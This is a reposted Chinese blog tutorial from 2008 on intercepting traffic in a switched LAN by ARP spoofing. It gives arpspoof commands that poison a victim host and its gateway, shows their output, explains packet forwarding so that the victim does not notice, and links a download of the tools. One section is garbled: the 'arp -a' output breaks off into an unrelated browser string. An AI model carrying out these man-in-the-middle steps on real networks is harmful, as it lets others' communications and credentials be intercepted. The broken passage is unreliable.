sniffer:[TIP]交换环境下的Sniffer ZT

on 2008-12-14 in 网络技术 | 0 Comment

  通常在局域网环境中我们都是通过环境网关上网在环境中使用NetXray或者NAI Snfer嗅探工具除了抓到自己包以外是不能看到其他主机网络通信
  
  但是我们可以通过利用ARP欺骗可以实现Snfer
  
  ARP是将IP解析为MAC地址局域网中通信都是基于MAC
  
  例如下面这样情况:
  
  在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网假定攻击者系统为192.168.0.24他希望听到192.168.0.29通信那么我们就可以利用ARP欺骗实现
  
  1、 首先告诉192.168.0.29网关192.168.0.1MAC地址是192.168.0.24
  
  2、 告诉192.168.0.1192.168.0.29MAC地址是192.168.0.24
  
  这样192.168.0.29和192.168.0.1的间数据包就会发给192.168.0.24也就是攻击者机器这样就可以听到会话了但是这么做个问题192.168.0.29发现自己不能上网了原来发给192.168.0.1数据包都被192.168.0.24接收了而并没有发给网关192.168.0.1
  
  这时候192.168.0.24设置个包转发东西就可以解决这个问题了也就是从192.168.0.29收到包转发给192.168.0.1在把从192.168.0.1收到包发给192.168.0.29这样192.168.0.29根本就不会意识到自己被监听了
  
  具体实现:
  
  1、 欺骗192.168.0.29告诉这台机器网关192.168.0.1MAC地址是自己(192.168.0.24)
  
  [root@Linux dsnf-2.3]# ./arpspoof -i eth0 -t 192.168.0.29 192.168.0.1
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:50:56:40:7:71
  
  0:0:21:0:0:18 0:0:86:61:6b:4e 0806 42: arp reply 192.168.0.1 is-at 0:0:21:0:0:18
  
  ………………………………..
  
  这时候对192.168.0.29ARP欺骗就开始了
  
   
  
  2、 欺骗192.168.0.1告诉网关192.168.0.29MAC地址是自己(192.168.0.24)
  
  [root@Linux dsnf-2.3]# ./arpspoof -i eth0 -t 192.168.0.1 192.168.0.29
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:50:56:40:7:71 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:50:56:40:7:71
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
  0:0:86:61:6b:4e 0:0:21:0:0:18 0806 42: arp reply 192.168.0.29 is-at 0:0:86:61:6b:4e
  
   
  
  其实在这个时候192.168.0.29是可以发现自己被欺骗了在CMD下面使用ARP –a命令:
  
  C:\WINNT>arp -a
  
  
  
  Interface: 192.168.0.29 _disibledevent=7" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  
  当然也可以知道其他………:-)
  
  
  整个过程需要在Linux下面实现所用到所有工具可以在http://www.netXeyes.org/arpsnfer.rar
  
  
Tags:  snifferpro4.7.5 antiarpsniffer snifferpro sniffer

延伸阅读

最新评论

发表评论